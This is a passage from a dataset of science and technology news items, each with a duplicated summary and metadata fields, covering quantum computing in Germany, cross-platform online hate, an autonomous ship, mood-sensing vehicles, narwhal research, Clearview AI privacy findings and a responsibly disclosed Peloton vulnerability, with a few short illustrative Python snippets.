in competition over who can build and exploit the most powerful computers. Quantum technology, while still in its infancy, promises to carry out previously impossible calculations at record speed. Germany hopes that quantum computing will spur innovation across industry - from transport and the environment to health. While traditional computers process "bits" of information that have the value 1 or 0, known as a binary code, quantum computers are able to process bits that can be 1 and 0 simultaneously, mirroring subatomic particle behavior. These quantum bits, also known as qubits, can run calculations much, much faster. Policymakers hope the tech will bring an economic windfall when applied to the economy. Self-driving cars, for example, could learn to drive more safely, and faster. The tech also promises to be able to crack sophisticated encryption. Benefits of quantum research accrue to countries that can host and use devices. Germany's computer, located near Stuttgart, is being built by U.S. tech company IBM and will be managed by Fraunhofer-Gesellschaft , Europe's leading organization for applied research. Researchers and companies will be able to develop and test their quantum algorithms and gather expertise by using the computer. Merkel's interest in the tech underscores the stakes for Germany and other European countries who are trying to build up a local tech sector and wean themselves off foreign providers. Though IBM's participation in the program highlights that even Germany isn't there yet. With few leading European quantum companies, IBM's providing both the computer itself, and the cloud it's connected to. Last year, Berlin announced a €2 billion investment in quantum over five years, and it can also tap into European Commission's €1 billion fund for quantum technologies. Still, Merkel acknowledged that Europe's behind and needed to catch up. "Quantum computing can play a ... key role in our endeavour to acquire technological and digital sovereignty," the chancellor said. "Of course we're not the only ones to realize that this is the case. 
The United States and China have invested enormous amounts of money." The U.S. and China currently hold the most patents on quantum computers and technology. The Chinese government reportedly spends at least $2.5 billion a year on quantum research. In 2018, Washington earmarked $1.2 billion for quantum research as part of its National Quantum Initiative Act. The federal government topped up the funding with other initiatives, including $237 million in the 2021 budget. Both countries can also count on their tech giants, including Alibaba, IBM and Microsoft. Amid tense discussions in Europe over who controls industrial data, Fraunhofer-Gesellschaft, the research institute, will store and process the data produced by the computer in IBM's data centers in Germany. "Orders will be sent to the quantum computer and can be further processed in traditional computers. For data privacy and sovereignty, the quantum computer will be operated under German law," said Reimund Neugebauer, president of Fraunhofer-Gesellschaft, at the launch. He said the institute has already concluded partnerships with companies and universities that will use the computer, but did not name them. Germany's minister for research Anja Karliczek said: "Building up this ecosystem is a very important question for security and sovereignty." "We also want to develop the hardware for quantum computing here in Germany, and I would like to emphasise that sovereignty doesn't mean we should isolate ourselves."
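The bit-versus-qubit distinction described in the article can be illustrated with a few lines of code. The sketch below uses the open-source Qiskit library (an assumption for illustration; it is not part of the Fraunhofer/IBM system discussed here) to put a single qubit into an equal superposition of 0 and 1.

```python
# Generic textbook illustration of a qubit in superposition, assuming Qiskit is installed.
# This is not code from, or specific to, the IBM/Fraunhofer machine described above.
from qiskit import QuantumCircuit
from qiskit.quantum_info import Statevector

qc = QuantumCircuit(1)
qc.h(0)  # Hadamard gate: puts the qubit into the state (|0> + |1>)/sqrt(2)

state = Statevector.from_instruction(qc)
print(state.probabilities())  # ~[0.5, 0.5]: the qubit is measured as 0 or 1 with equal probability
```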
238
Malicious Content Exploits Pathways Between Platforms to Thrive Online, Subvert Moderation
Malicious COVID-19 online content - including racist messages, disinformation and misinformation - thrives and spreads online by bypassing the moderation efforts of individual social media platforms, according to a new research study led by George Washington University Professor of Physics Neil Johnson and published in the journal Scientific Reports . By mapping online hate clusters across six major social media platforms, Dr. Johnson and a team of researchers revealed how malicious content exploits pathways between platforms, highlighting the need for social media companies to rethink and adjust their content moderation policies. The research team set out to understand how and why malicious content thrives so well online despite significant moderation efforts, and how it can be stopped. They used a combination of machine learning and network data science to investigate how online hate communities wielded COVID-19 as a weapon and used current events to draw in new followers. "Until now, slowing the spread of malicious content online has been like playing a game of whack-a-mole, because a map of the online hate multiverse did not exist," said Dr. Johnson, who is also a researcher at the GW Institute for Data, Democracy & Politics . "You cannot win a battle if you don't have a map of the battlefield. In our study, we laid out a first-of-its-kind map of this battlefield. Whether you're looking at traditional hate topics, such as anti-Semitism or anti-Asian racism surrounding COVID-19, the battlefield map is the same. And it is this map of links within and between platforms that is the missing piece in understanding how we can slow or stop the spread of online hate content." The researchers began by mapping how hate clusters interconnect to spread their narratives across social media platforms. Focusing on six platforms - Facebook, VKontakte, Instagram, Gab, Telegram and 4Chan - the team started with a given hate cluster and looked outward to find a second cluster that was strongly connected to the original. They found the strongest connections were VKontakte into Telegram (40.83 percent of cross-platform connections), Telegram into 4Chan (11.09 percent) and Gab into 4Chan (10.90 percent). The researchers then turned their attention to identifying malicious content related to COVID-19. They found that the coherence of COVID-19 discussion increased rapidly in the early phases of the pandemic, with hate clusters forming narratives and cohering around COVID-19 topics and misinformation. To subvert moderation efforts by social media platforms, groups sending hate messages used several adaptation strategies in order to regroup on other platforms or reenter a platform once they are banned, the researchers found. For example, clusters frequently changed their names to avoid detection by moderators' algorithms, such as typing "vaccine" as "va$$ine." Similarly, anti-Semitic and anti-LGBTQ clusters simply add strings of 1's or A's before their name. "Because the number of independent social media platforms is growing, these hate-generating clusters are very likely to strengthen and expand their interconnections via new links and will likely exploit new platforms that lie beyond the reach of the U.S. and other Western nations' jurisdictions," Dr. Johnson said. "The chances of getting all social media platforms globally to work together to solve this are very slim. However, our mathematical analysis identifies strategies that platforms can use as a group to effectively slow or block online hate content." 
Based on their findings, the team, which included researchers at Google, suggested several ways for social media platforms to slow the spread of malicious content: "Our study demonstrates a similarity between the spread of online hate and the spread of a virus," said Yonatan Lupu , an associate professor of political science at GW and co-author on the study. "Individual social media platforms have had difficulty controlling the spread of online hate, which mirrors the difficulty individual countries around the world have had in stopping the spread of the COVID-19 virus." Going forward, the research team already is using their map and its mathematical modeling to analyze other forms of malicious content, including the weaponization of COVID-19 vaccine misinformation. They are also examining the extent to which single actors, including foreign governments, may play a more influential or controlling role in this space than others.
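To make the cross-platform mapping idea above concrete, here is a minimal, hypothetical sketch of how links between hate clusters on different platforms could be aggregated into the kind of percentages quoted in the study (e.g., VKontakte into Telegram). The edge list is invented for illustration; it is not the study's data or code.

```python
# Hedged sketch: count directed cluster-to-cluster links by platform pair and report
# each pair's share of all cross-platform connections. Data below is made up.
from collections import Counter

# Each edge: (source cluster's platform, target cluster's platform)
cluster_links = [
    ("VKontakte", "Telegram"),
    ("VKontakte", "Telegram"),
    ("Telegram", "4Chan"),
    ("Gab", "4Chan"),
    ("Facebook", "Instagram"),
]

counts = Counter(cluster_links)
total = sum(counts.values())
for (src, dst), n in counts.most_common():
    print(f"{src} -> {dst}: {100 * n / total:.2f}% of cross-platform connections")
```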
New research indicates that malicious COVID-19 content circumvents social media platforms' moderation initiatives to prosper online. George Washington University (GW) investigators combined machine learning with network data science to detail malicious content's exploitation of pathways between platforms. The team mapped the interconnection of hate clusters to spread their narratives across Facebook, VKontakte, Instagram, Gab, Telegram, and 4Chan. They found the COVID-19 discussion solidified in the early phases of the pandemic, with hate clusters subverting moderation via adaptive methods to regroup on other platforms and/or re-infiltrate a platform. GW's Yonatan Lupu said, "Our study demonstrates a similarity between the spread of online hate and the spread of a virus. Individual social media platforms have had difficulty controlling the spread of online hate, which mirrors the difficulty individual countries around the world have had in stopping the spread of the COVID-19 virus."
[]
[]
[]
scitechnews
None
None
None
None
New research indicates that malicious COVID-19 content circumvents social media platforms' moderation initiatives to prosper online. George Washington University (GW) investigators combined machine learning with network data science to detail malicious content's exploitation of pathways between platforms. The team mapped the interconnection of hate clusters to spread their narratives across Facebook, VKontakte, Instagram, Gab, Telegram, and 4Chan. They found the COVID-19 discussion solidified in the early phases of the pandemic, with hate clusters subverting moderation via adaptive methods to regroup on other platforms and/or re-infiltrate a platform. GW's Yonatan Lupu said, "Our study demonstrates a similarity between the spread of online hate and the spread of a virus. Individual social media platforms have had difficulty controlling the spread of online hate, which mirrors the difficulty individual countries around the world have had in stopping the spread of the COVID-19 virus." Malicious COVID-19 online content - including racist messages, disinformation and misinformation - thrives and spreads online by bypassing the moderation efforts of individual social media platforms, according to a new research study led by George Washington University Professor of Physics Neil Johnson and published in the journal Scientific Reports . By mapping online hate clusters across six major social media platforms, Dr. Johnson and a team of researchers revealed how malicious content exploits pathways between platforms, highlighting the need for social media companies to rethink and adjust their content moderation policies. The research team set out to understand how and why malicious content thrives so well online despite significant moderation efforts, and how it can be stopped. They used a combination of machine learning and network data science to investigate how online hate communities wielded COVID-19 as a weapon and used current events to draw in new followers. "Until now, slowing the spread of malicious content online has been like playing a game of whack-a-mole, because a map of the online hate multiverse did not exist," said Dr. Johnson, who is also a researcher at the GW Institute for Data, Democracy & Politics . "You cannot win a battle if you don't have a map of the battlefield. In our study, we laid out a first-of-its-kind map of this battlefield. Whether you're looking at traditional hate topics, such as anti-Semitism or anti-Asian racism surrounding COVID-19, the battlefield map is the same. And it is this map of links within and between platforms that is the missing piece in understanding how we can slow or stop the spread of online hate content." The researchers began by mapping how hate clusters interconnect to spread their narratives across social media platforms. Focusing on six platforms - Facebook, VKontakte, Instagram, Gab, Telegram and 4Chan - the team started with a given hate cluster and looked outward to find a second cluster that was strongly connected to the original. They found the strongest connections were VKontakte into Telegram (40.83 percent of cross-platform connections), Telegram into 4Chan (11.09 percent) and Gab into 4Chan (10.90 percent). The researchers then turned their attention to identifying malicious content related to COVID-19. They found that the coherence of COVID-19 discussion increased rapidly in the early phases of the pandemic, with hate clusters forming narratives and cohering around COVID-19 topics and misinformation. 
To subvert moderation efforts by social media platforms, groups sending hate messages used several adaptation strategies in order to regroup on other platforms or reenter a platform once they are banned, the researchers found. For example, clusters frequently changed their names to avoid detection by moderators' algorithms, such as typing "vaccine" as "va$$ine." Similarly, anti-Semitic and anti-LGBTQ clusters simply add strings of 1's or A's before their name. "Because the number of independent social media platforms is growing, these hate-generating clusters are very likely to strengthen and expand their interconnections via new links and will likely exploit new platforms that lie beyond the reach of the U.S. and other Western nations' jurisdictions," Dr. Johnson said. "The chances of getting all social media platforms globally to work together to solve this are very slim. However, our mathematical analysis identifies strategies that platforms can use as a group to effectively slow or block online hate content." Based on their findings, the team, which included researchers at Google, suggested several ways for social media platforms to slow the spread of malicious content: "Our study demonstrates a similarity between the spread of online hate and the spread of a virus," said Yonatan Lupu , an associate professor of political science at GW and co-author on the study. "Individual social media platforms have had difficulty controlling the spread of online hate, which mirrors the difficulty individual countries around the world have had in stopping the spread of the COVID-19 virus." Going forward, the research team already is using their map and its mathematical modeling to analyze other forms of malicious content, including the weaponization of COVID-19 vaccine misinformation. They are also examining the extent to which single actors, including foreign governments, may play a more influential or controlling role in this space than others.
239
Robotic Ship Sets Off to Retrace the Mayflower's Journey
SWANSEA, Wales (AP) - Four centuries and one year after the Mayflower departed from Plymouth, England, on a historic sea journey to America, another trailblazing vessel with the same name has set off to retrace the voyage. This Mayflower, though, is a sleek, modern robotic ship that is carrying no human crew or passengers. It's being piloted by sophisticated artificial intelligence technology for a trans-Atlantic crossing that could take up to three weeks, in a project aimed at revolutionizing marine research. IBM, which built the ship with nonprofit marine research organization ProMare, confirmed the Mayflower Autonomous Ship began its trip early Tuesday. Charting the path of its 1620 namesake, the Mayflower is set to land at Provincetown on Cape Cod before making its way to Plymouth, Massachusetts. If successful, it would be the largest autonomous vessel to cross the Atlantic. The new Mayflower's journey was originally scheduled for last year, part of 400th anniversary commemorations of the original ship's voyage carrying Pilgrim settlers to New England. Those commemorations were set to involve the British, Americans, Dutch - and the Wampanoag people on whose territory the settlers landed, and who had been marginalized on past anniversaries. The Mayflower project aims to usher in a new age for automated research ships. Its designers hope it will be the first in a new generation of high-tech vessels that can explore ocean regions that are too difficult or dangerous for people to go to. The 50-foot (15-meter) trimaran, propelled by a solar-powered hybrid electric motor, bristles with artificial intelligence-powered cameras and dozens of onboard sensors that will collect data on ocean acidification, microplastics and marine mammal conservation. Its launch has been delayed by the coronavirus pandemic, and more recently, bad weather throughout May, IBM spokesman Jonathan Batty said. But Batty said the delay allowed for the fitting of a unique feature on the ship: an electric "tongue" that can provide instant analysis of the ocean's chemistry, called Hypertaste. "It's a brand new piece of equipment that's never been created before," Batty said. The cutting-edge, 1 million pound ($1.3 million) ship could take up to three weeks to voyage across the North Atlantic, if forecasts for good weather hold up. The ship is also carrying mementos from people at either end of the journey, such as rocks, personal photos, and books. People can follow its journey online .
The Mayflower Autonomous Ship set off this week to retrace the journey of its 1620 namesake across the Atlantic Ocean. The robotic ship, piloted by artificial intelligence (AI) technology and carrying no human crew or passengers, will make the trans-Atlantic crossing from Plymouth, U.K., to Provincetown, MA, and then to Plymouth, MA, in three weeks or less. Built by IBM and the nonprofit marine research organization ProMare, the 50-foot trimaran is propelled by a solar-powered hybrid electric motor and will gather data as it goes on ocean acidification, microplastics, and marine mammal conservation using AI-powered cameras and onboard sensors. The $1.3-million ship's journey can be followed online at
[]
[]
[]
scitechnews
None
None
None
None
The Mayflower Autonomous Ship set off this week to retrace the journey of its 1620 namesake across the Atlantic Ocean. The robotic ship, piloted by artificial intelligence (AI) technology and carrying no human crew or passengers, will make the trans-Atlantic crossing from Plymouth, U.K., to Provincetown, MA, and then to Plymouth, MA, in three weeks or less. Built by IBM and the nonprofit marine research organization ProMare, the 50-foot trimaran is propelled by a solar-powered hybrid electric motor and will gather data as it goes on ocean acidification, microplastics, and marine mammal conservation using AI-powered cameras and onboard sensors. The $1.3-million ship's journey can be followed online at SWANSEA, Wales (AP) - Four centuries and one year after the Mayflower departed from Plymouth, England, on a historic sea journey to America, another trailblazing vessel with the same name has set off to retrace the voyage. This Mayflower, though, is a sleek, modern robotic ship that is carrying no human crew or passengers. It's being piloted by sophisticated artificial intelligence technology for a trans-Atlantic crossing that could take up to three weeks, in a project aimed at revolutionizing marine research. IBM, which built the ship with nonprofit marine research organization ProMare, confirmed the Mayflower Autonomous Ship began its trip early Tuesday. Charting the path of its 1620 namesake, the Mayflower is set to land at Provincetown on Cape Cod before making its way to Plymouth, Massachusetts. If successful, it would be the largest autonomous vessel to cross the Atlantic. The new Mayflower's journey was originally scheduled for last year, part of 400th anniversary commemorations of the original ship's voyage carrying Pilgrim settlers to New England. Those commemorations were set to involve the British, Americans, Dutch - and the Wampanoag people on whose territory the settlers landed, and who had been marginalized on past anniversaries. The Mayflower project aims to usher in a new age for automated research ships. Its designers hope it will be the first in a new generation of high-tech vessels that can explore ocean regions that are too difficult or dangerous for people to go to. The 50-foot (15-meter) trimaran, propelled by a solar-powered hybrid electric motor, bristles with artificial intelligence-powered cameras and dozens of onboard sensors that will collect data on ocean acidification, microplastics and marine mammal conservation. Its launch has been delayed by the coronavirus pandemic, and more recently, bad weather throughout May, IBM spokesman Jonathan Batty said. But Batty said the delay allowed for the fitting of a unique feature on the ship: an electric "tongue" that can provide instant analysis of the ocean's chemistry, called Hypertaste. "It's a brand new piece of equipment that's never been created before," Batty said. The cutting-edge, 1 million pound ($1.3 million) ship could take up to three weeks to voyage across the North Atlantic, if forecasts for good weather hold up. The ship is also carrying mementos from people at either end of the journey, such as rocks, personal photos, and books. People can follow its journey online .
240
Invention Uses Machine-Learned Human Emotions to 'Drive' Autonomous Vehicles
Mehrdad Nojoumian, Ph.D., inventor, and an associate professor in the Department of Computer and Electrical Engineering and Computer Science and director of the Privacy, Security and Trust in Autonomy Lab. Americans have one of the highest levels of fear in the world when it comes to technology related to robotic systems and self-driving cars. Addressing these concerns is paramount if the technology hopes to move forward. A researcher from Florida Atlantic University 's College of Engineering and Computer Science has developed new technology for autonomous systems that is responsive to human emotions based on machine-learned human moods. His solution, "Adaptive Mood Control in Semi or Fully Autonomous Vehicles," has earned a very competitive utility patent from the United States Patent and Trademark Office for FAU. Adaptive Mood Control provides a convenient, pleasant, and more importantly, trustworthy experience for humans who interact with autonomous vehicles. The technology can be used in a wide range of autonomous systems, including self-driving cars, autonomous military vehicles, autonomous airplanes or helicopters, and even social robots. "The uniqueness of this invention is that the operational modes and parameters related to perceived emotion are exchanged with adjacent vehicles for achieving objectives of the adaptive mood control module in the semi or fully autonomous vehicle in a cooperative driving context," said Mehrdad Nojoumian , Ph.D., inventor, and an associate professor in the Department of Computer and Electrical Engineering and Computer Science and director of the Privacy, Security and Trust in Autonomy Lab. "Human-AI/autonomy interaction is at the center of attention by academia and industries. More specifically, trust between humans and AI/autonomous technologies plays a critical role in this domain, because it will directly affect the social acceptability of these modern technologies." The patent, titled "Adaptive Mood Control in Semi or Fully Autonomous Vehicles," uses non-intrusive sensory solutions in semi or fully autonomous vehicles to perceive the mood of the drivers and passengers. Information is collected based on facial expressions, sensors within the handles/seats and thermal cameras among other monitoring devices. Additionally, the adaptive mood control system contains real-time machine-learning mechanisms that can continue to learn the driver's and passengers' moods over time. The results are then sent to the autonomous vehicle's software system allowing the vehicle to respond to perceived emotions by choosing an appropriate mode of operations such as normal, cautious or alert driving mode. -FAU-
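As a rough illustration of the idea described above -- a perceived occupant mood feeding the choice of driving mode -- the following hypothetical sketch maps a machine-learned mood estimate to one of the three modes mentioned (normal, cautious, alert). The mood labels, confidence threshold, and function are invented for illustration; this is not the patented module.

```python
# Hedged sketch of mood-to-mode selection; labels and thresholds are hypothetical.
from enum import Enum

class DrivingMode(Enum):
    NORMAL = "normal"
    CAUTIOUS = "cautious"
    ALERT = "alert"

def select_mode(perceived_mood: str, confidence: float) -> DrivingMode:
    """Pick a driving mode from a machine-learned mood estimate and its confidence."""
    if confidence < 0.5:  # low-confidence estimate: stay conservative
        return DrivingMode.CAUTIOUS
    if perceived_mood in ("anxious", "fearful"):
        return DrivingMode.CAUTIOUS
    if perceived_mood in ("distressed", "angry"):
        return DrivingMode.ALERT
    return DrivingMode.NORMAL

print(select_mode("anxious", 0.8).value)  # -> cautious
```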
Florida Atlantic University (FAU) 's Mehrdad Nojoumian has designed and patented new technology for autonomous systems that uses machine-learned human moods to respond to human emotions. Nojoumian's adaptive mood control system employs non-intrusive sensory solutions in semi- or fully autonomous vehicles to read the mood of drivers and passengers. In-vehicle sensors collect data based on facial expressions and other emotional cues of the vehicle's occupants, then use real-time machine learning mechanisms to identify occupants' moods over time. The vehicle responds to perceived emotions by selecting a suitable driving mode (normal, cautious, or alert). FAU's Stella Batalama said Nojoumian's system overcomes self-driving vehicles' inability to accurately forecast the behavior of other self-driving and human-driven vehicles.
[]
[]
[]
scitechnews
None
None
None
None
Florida Atlantic University (FAU) 's Mehrdad Nojoumian has designed and patented new technology for autonomous systems that uses machine-learned human moods to respond to human emotions. Nojoumian's adaptive mood control system employs non-intrusive sensory solutions in semi- or fully autonomous vehicles to read the mood of drivers and passengers. In-vehicle sensors collect data based on facial expressions and other emotional cues of the vehicle's occupants, then use real-time machine learning mechanisms to identify occupants' moods over time. The vehicle responds to perceived emotions by selecting a suitable driving mode (normal, cautious, or alert). FAU's Stella Batalama said Nojoumian's system overcomes self-driving vehicles' inability to accurately forecast the behavior of other self-driving and human-driven vehicles. Mehrdad Nojoumian, Ph.D., inventor, and an associate professor in the Department of Computer and Electrical Engineering and Computer Science and director of the Privacy, Security and Trust in Autonomy Lab. Americans have one of the highest levels of fear in the world when it comes to technology related to robotic systems and self-driving cars. Addressing these concerns is paramount if the technology hopes to move forward. A researcher from Florida Atlantic University 's College of Engineering and Computer Science has developed new technology for autonomous systems that is responsive to human emotions based on machine-learned human moods. His solution, "Adaptive Mood Control in Semi or Fully Autonomous Vehicles," has earned a very competitive utility patent from the United States Patent and Trademark Office for FAU. Adaptive Mood Control provides a convenient, pleasant, and more importantly, trustworthy experience for humans who interact with autonomous vehicles. The technology can be used in a wide range of autonomous systems, including self-driving cars, autonomous military vehicles, autonomous airplanes or helicopters, and even social robots. "The uniqueness of this invention is that the operational modes and parameters related to perceived emotion are exchanged with adjacent vehicles for achieving objectives of the adaptive mood control module in the semi or fully autonomous vehicle in a cooperative driving context," said Mehrdad Nojoumian , Ph.D., inventor, and an associate professor in the Department of Computer and Electrical Engineering and Computer Science and director of the Privacy, Security and Trust in Autonomy Lab. "Human-AI/autonomy interaction is at the center of attention by academia and industries. More specifically, trust between humans and AI/autonomous technologies plays a critical role in this domain, because it will directly affect the social acceptability of these modern technologies." The patent, titled "Adaptive Mood Control in Semi or Fully Autonomous Vehicles," uses non-intrusive sensory solutions in semi or fully autonomous vehicles to perceive the mood of the drivers and passengers. Information is collected based on facial expressions, sensors within the handles/seats and thermal cameras among other monitoring devices. Additionally, the adaptive mood control system contains real-time machine-learning mechanisms that can continue to learn the driver's and passengers' moods over time. The results are then sent to the autonomous vehicle's software system allowing the vehicle to respond to perceived emotions by choosing an appropriate mode of operations such as normal, cautious or alert driving mode. -FAU-
241
Algorithm Reveals Mysterious Foraging Habits of Narwhals
The small whale, known for its distinctively spiraled tusk, is under mounting pressure due to warming waters and the subsequent increase in Arctic shipping traffic. To better care for narwhals, we need to learn more about their foraging behaviour - and how these may change as a result of human disturbances and global warming. Biologists know almost nothing about this. Because narwhals live in isolated Arctic regions and hunt at depths of up to 1,000 meters, it is very difficult - sometimes impossible - to gain any insight whatsoever. Ironically, artificial intelligence may be the answer to the mystery of their natural behaviours. An interdisciplinary collaboration between mathematicians, computer scientists and marine biologists from the University of Copenhagen and the Greenland Institute of Natural Resources demonstrates that algorithms can be used to map the foraging behavior of this enigmatic whale. "We have shown that our algorithm can actually predict that when narwhals emit certain sounds, they are hunting prey. This opens up entirely new insights into the life of narwhals," explains Susanne Ditlevsen, a professor at UCPH's Department of Mathematical Sciences who has helped marine biologists in Greenland with the processing of data for several years. "It is crucial to gain more insight into where and when narwhals hunt for food as sea ice recedes. If they are disturbed by shipping traffic, it matters whether this is in the middle of an important foraging area. Finding out however, is incredibly difficult. Here, artificial intelligence seems to be able to make a huge difference and to a great extent, provide us with knowledge that could not otherwise have been obtained," says cetacean researcher Mads Peter Heide-Jørgensen, a professor at the Greenland Institute of Natural Resources and adjunct professor at the University of Copenhagen. He adds: "In a situation where narwhals are in deep water, in the middle of the Bay of Baffin during December, we currently have no way of finding out where or when they are foraging. Here, artificial intelligence seems to be the way forward." Until now, the best way to learn about the hunting patterns of narwhals has been to collect acoustic data using measuring instruments attached to their bodies. Like bats, narwhals orient themselves using echolocation. By making clicking sounds, they explore their environment and orient themselves. As they begin to hunt, these clicks shorten in interval to become buzzing. While the buzzing sounds are therefore interesting to researchers, it is impossible to collect acoustic data in many places. Furthermore, recording these sounds is highly data-intensive and time consuming to analyze manually. As a result, the researchers set out to investigate whether, by using artificial intelligence, they could find a pattern in the way whales move and the buzzes they emit. In the future, this would make it possible for them to rely only on measurements of animal movements using an accelerometer, a simple to use technology familiar to us from our smartphones. "The major challenge was that these whales have very complex movement patterns, which can be tough to analyze. This becomes possible only with the use of deep learning, which could learn to recognize both the various swimming patterns of whales as well as their buzzing sounds. The algorithm then discovered connections between the two," explains Assistant Professor Raghavendra Selvan of the Department of Computer Science. 
The researchers trained the algorithm using large quantities of data collected from five narwhals in Scoresby Sound fjord in East Greenland. Now, the researchers hope to add to the algorithm by characterizing different types of buzzing sounds in order to identify the precise buzzing sounds that lead to a catch. This can be achieved by collecting data in which biologists give whales a temperature pill that detects temperature drops in their stomachs as they consume cold fish or squid.
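The supervised framing described above -- linking windows of accelerometer data to the presence of hunting buzzes -- can be sketched as follows. The study used deep learning on real tag data; here synthetic data and a simple off-the-shelf classifier stand in purely to show the input/output structure, not the actual model.

```python
# Hedged sketch: predict whether a window of 3-axis accelerometer data coincides with
# echolocation buzzing. Data and labels below are synthetic placeholders.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
n_windows, window_len = 500, 50
X = rng.normal(size=(n_windows, window_len * 3))  # flattened 3-axis accelerometer windows
y = rng.integers(0, 2, size=n_windows)            # 1 = buzzing detected in this window (synthetic)

X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_train, y_train)
print("held-out accuracy:", clf.score(X_test, y_test))  # ~0.5 on random synthetic labels
```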
Researchers at Denmark's University of Copenhagen and the Greenland Institute of Natural Resources utilized algorithms in their study of the foraging habits of narwhals, and how they may be affected by human disturbances and global warming. The researchers used artificial intelligence to detect patterns in the way narwhals move and the sounds they emit. Among their findings was that certain sounds indicate when narwhals are hunting prey. University of Copenhagen's Raghavendra Selvan said, "The major challenge was that these whales have very complex movement patterns, which can be tough to analyze. This becomes possible only with the use of deep learning, which could learn to recognize both the various swimming patterns of whales, as well as their buzzing sounds. The algorithm then discovered connections between the two."
[]
[]
[]
scitechnews
None
None
None
None
Researchers at Denmark's University of Copenhagen and the Greenland Institute of Natural Resources utilized algorithms in their study of the foraging habits of narwhals, and how they may be affected by human disturbances and global warming. The researchers used artificial intelligence to detect patterns in the way narwhals move and the sounds they emit. Among their findings was that certain sounds indicate when narwhals are hunting prey. University of Copenhagen's Raghavendra Selvan said, "The major challenge was that these whales have very complex movement patterns, which can be tough to analyze. This becomes possible only with the use of deep learning, which could learn to recognize both the various swimming patterns of whales, as well as their buzzing sounds. The algorithm then discovered connections between the two." The small whale, known for its distinctively spiraled tusk, is under mounting pressure due to warming waters and the subsequent increase in Arctic shipping traffic. To better care for narwhals, we need to learn more about their foraging behaviour - and how these may change as a result of human disturbances and global warming. Biologists know almost nothing about this. Because narwhals live in isolated Arctic regions and hunt at depths of up to 1,000 meters, it is very difficult - sometimes impossible - to gain any insight whatsoever. Ironically, artificial intelligence may be the answer to the mystery of their natural behaviours. An interdisciplinary collaboration between mathematicians, computer scientists and marine biologists from the University of Copenhagen and the Greenland Institute of Natural Resources demonstrates that algorithms can be used to map the foraging behavior of this enigmatic whale. "We have shown that our algorithm can actually predict that when narwhals emit certain sounds, they are hunting prey. This opens up entirely new insights into the life of narwhals," explains Susanne Ditlevsen, a professor at UCPH's Department of Mathematical Sciences who has helped marine biologists in Greenland with the processing of data for several years. "It is crucial to gain more insight into where and when narwhals hunt for food as sea ice recedes. If they are disturbed by shipping traffic, it matters whether this is in the middle of an important foraging area. Finding out however, is incredibly difficult. Here, artificial intelligence seems to be able to make a huge difference and to a great extent, provide us with knowledge that could not otherwise have been obtained," says cetacean researcher Mads Peter Heide-Jørgensen, a professor at the Greenland Institute of Natural Resources and adjunct professor at the University of Copenhagen. He adds: "In a situation where narwhals are in deep water, in the middle of the Bay of Baffin during December, we currently have no way of finding out where or when they are foraging. Here, artificial intelligence seems to be the way forward." Until now, the best way to learn about the hunting patterns of narwhals has been to collect acoustic data using measuring instruments attached to their bodies. Like bats, narwhals orient themselves using echolocation. By making clicking sounds, they explore their environment and orient themselves. As they begin to hunt, these clicks shorten in interval to become buzzing. While the buzzing sounds are therefore interesting to researchers, it is impossible to collect acoustic data in many places. Furthermore, recording these sounds is highly data-intensive and time consuming to analyze manually. 
As a result, the researchers set out to investigate whether, by using artificial intelligence, they could find a pattern in the way whales move and the buzzes they emit. In the future, this would make it possible for them to rely only on measurements of animal movements using an accelerometer, a simple to use technology familiar to us from our smartphones. "The major challenge was that these whales have very complex movement patterns, which can be tough to analyze. This becomes possible only with the use of deep learning, which could learn to recognize both the various swimming patterns of whales as well as their buzzing sounds. The algorithm then discovered connections between the two," explains Assistant Professor Raghavendra Selvan of the Department of Computer Science. The researchers trained the algorithm using large quantities of data collected from five narwhals in Scoresby Sound fjord in East Greenland. Now, the researchers hope to add to the algorithm by characterizing different types of buzzing sounds in order to identify the precise buzzing sounds that lead to a catch. This can be achieved by collecting data in which biologists give whales a temperature pill that detects temperature drops in their stomachs as they consume cold fish or squid.
242
Canadian Regulators Seek Policy Amendments for Facial Recognition
Canada's Office of the Privacy Commissioner has cited the Royal Canadian Mounted Police (RCMP) for breaking federal privacy law by using facial recognition software from Clearview AI. Regulators said Clearview compiled biometric information without the knowledge or consent of individuals; the company has a database of roughly 3 billion photos harvested from the Internet. Canadian Privacy Commissioner Daniel Therrien also requested clarification from Canada's Parliament on the treatment of online images of people's faces, and said police must ensure third-party data providers' information collection practices comply with privacy statutes. Therrien said Canadian laws should stipulate that the concept of publicly available personal information "does not apply to information where an individual has a reasonable expectation of privacy."
[]
[]
[]
scitechnews
None
None
None
None
Canada's Office of the Privacy Commissioner has cited the Royal Canadian Mounted Police (RCMP) for breaking federal privacy law by using facial recognition software from Clearview AI. Regulators said Clearview compiled biometric information without the knowledge or consent of individuals; the company has a database of roughly 3 billion photos harvested from the Internet. Canadian Privacy Commissioner Daniel Therrien also requested clarification from Canada's Parliament on the treatment of online images of people's faces, and said police must ensure third-party data providers' information collection practices comply with privacy statutes. Therrien said Canadian laws should stipulate that the concept of publicly available personal information "does not apply to information where an individual has a reasonable expectation of privacy."
243
McAfee Finds Security Vulnerability in Peloton Products
Software security company McAfee said it exposed a vulnerability in the Peloton Bike+ that allowed attackers to install malware through a USB port and potentially spy on riders. The Advanced Threat Research Team at McAfee said the problem stemmed from the Android attachment that accompanies the Peloton stationary exercise Bike+. McAfee said attackers could access the bike through the port and install fake versions of popular apps like Netflix and Spotify, which could then fool users into entering their personal information. A Peloton Bike+ in a public, shared place, such as a hotel or a gym, would be especially vulnerable to the attack. "The flaw was that Peloton actually failed to validate that the operating system loaded," said Steve Povolny, head of the threat research team. "And ultimately what that means then is they can install malicious software, they can create Trojan horses and give themselves back doors into the bike, and even access the webcam." Povolny said there are "interactive maps" online showing Peloton bikes and treadmills in the U.S., which can give attackers an easy way to find those in public spaces and eventually access users' accounts. Hackers could then upload a "completely customized malicious image" that would eventually grant them access to a rider's microphone, camera and apps, he said. "Not only could you spy on riders but, maybe more importantly, their surroundings, sensitive information," Povolny said. Peloton confirmed in a statement that engineers from McAfee alerted them to the problem "via our Coordinated Vulnerability Disclosure program" and said they were working with the security company to fix the issue. McAfee said it disclosed the vulnerability to Peloton about three months ago and heard back from the company within a couple of weeks. "McAfee reported a vulnerability to us that required direct, physical access to a Peloton Bike+ or Tread to exploit the issue," the exercise equipment company said in a statement. "Peloton also pushed a mandatory update to affected devices last week that addressed this vulnerability." Experts say any device that connects to the internet - like a TV, an appliance or even a toy - could be a way for hackers to get your personal data. Cybersecurity experts say you should turn on automatic software updates and consider security software for your home network. Peloton 